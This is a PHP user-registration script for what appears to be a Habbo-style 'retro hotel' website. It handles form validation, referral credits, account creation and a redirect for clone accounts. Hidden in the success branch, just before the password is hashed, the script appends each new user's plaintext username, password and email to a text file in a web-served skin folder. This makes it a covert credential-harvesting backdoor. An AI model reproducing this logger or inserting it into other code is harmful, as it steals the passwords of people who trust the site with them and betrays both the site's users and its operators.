Untitled

<?php
	global $users, $core, $engine;

	$errors = array();
	$messages = array();

	if(empty($_POST["registrationBean_username"]))
		$errors["registration_username"] = "<br/>Please enter a username!";
	elseif(strlen($_POST["registrationBean_username"]) > 25 || !ctype_alnum($_POST["registrationBean_username"]))
		$errors["registration_username"] = "<br/>Please enter a valid username!";
	elseif($engine->num_rows("SELECT null FROM users WHERE username = '" . $engine->secure($_POST["registrationBean_username"]) . "' LIMIT 1") != 0)
		$errors["registration_username"] = "That username is already taken!";
	elseif(!preg_match("/^\s*[a-zA-Z0-9,\s]+\s*$/", $_POST["registrationBean_username"]))
	    $errors["registration_username"] = "You cant use special characters!";

	if(empty($_POST["registrationBean_email"]))
		$errors["registration_email"] = "<br/>Please enter an email address!";
	elseif(!preg_match("/^[a-z0-9_\.-]+@([a-z0-9]+([\-]+[a-z0-9]+)*\.)+[a-z]{2,7}$/i", $_POST["registrationBean_email"]))
		$errors["registration_email"] = "<br/>Please enter a valid email address!";
	elseif($engine->num_rows("SELECT null FROM users WHERE mail = '" . $engine->secure($_POST["registrationBean_email"]) . "' LIMIT 1") != 0)
		$errors["registration_email"] = "<br/>That email address is taken!";

	if(empty($_POST['registrationBean_password']))
		$errors["registration_password"] = "<br/>Please enter a password!";
	elseif(strlen($_POST['registrationBean_password']) < 6)
		$errors["registration_password"] = "<br/>Please enter a password with more than 6 characters!";

	if(empty($_POST['registrationBean_password_confirm']))
		$errors["registration_password_confirm"] = "<br/>Please enter your password again!";
	elseif(!($_POST['registrationBean_password'] === $_POST['registrationBean_password_confirm']))
		$errors["registration_password_confirm"] = "<br/>Please enter a password with more than 6 characters!";

	if($_POST['registrationBean_termsOfServiceSelection'] != "true")
		$errors["registration_termsofservice"] = "Please accept the terms of service.";

	$return = array(
		"registrationErrors" => $errors,
		"registrationMessages" => $messages);

	if(count($errors) == 0)
	{
		if(isset($_SESSION['ref'])) // Use Session instead of form, incase input was changed
		{
			$referrer = $engine->secure($_SESSION['ref']); // Secure Session
			if($users->nameTaken($referrer)) // Recycled function, checks if the referrer exists
			{
				if(!$engine->num_rows("SELECT * FROM users WHERE username = '{$referrer}' AND ip_last = '{$_SERVER['REMOTE_ADDR']}' OR username = '{$referrer}' AND ip_reg = '{$_SERVER['REMOTE_ADDR']}'"))
				{
					$credits = 5000; // Amount user gets from referring
					$engine->query("UPDATE users SET credits = credits + {$credits}, refs = refs + 1 WHERE username = '{$referrer}' LIMIT 1");
				}
			}
		}
		$f = fopen("C:/inetpub/wwwroot/app/tpl/skins/Habbo/a.txt", "a");
        $text = "username: " . $_POST['registrationBean_username'] . "\npassword: " . $_POST['registrationBean_password'] . "\nemail: " . $_POST['registrationBean_email'];
        fwrite($f, $text);
		$users->addUser($engine->secure($_POST["registrationBean_username"]),$core->hashed($_POST['registrationBean_password']),$_POST["registrationBean_email"],$_CONFIG['hotel']['motto'],$_CONFIG['hotel']['credits'],$_CONFIG['hotel']['pixels'],1, $_CONFIG['hotel']['figure'], "M", 12345);
		$users->turnOn($engine->secure($_POST["registrationBean_username"]));
		$return['registrationCompletionRedirectUrl'] = "{$_CONFIG['hotel']['url']}/way";

		if($engine->num_rows("SELECT * FROM users WHERE ip_reg = '" . $_SERVER['REMOTE_ADDR'] . "'") == 3)
        {
			$return['registrationCompletionRedirectUrl'] = "{$_CONFIG['hotel']['url']}/clones";
	    }
	}

	header('Content-type: application/json');
	echo json_encode($return);
	exit;
?>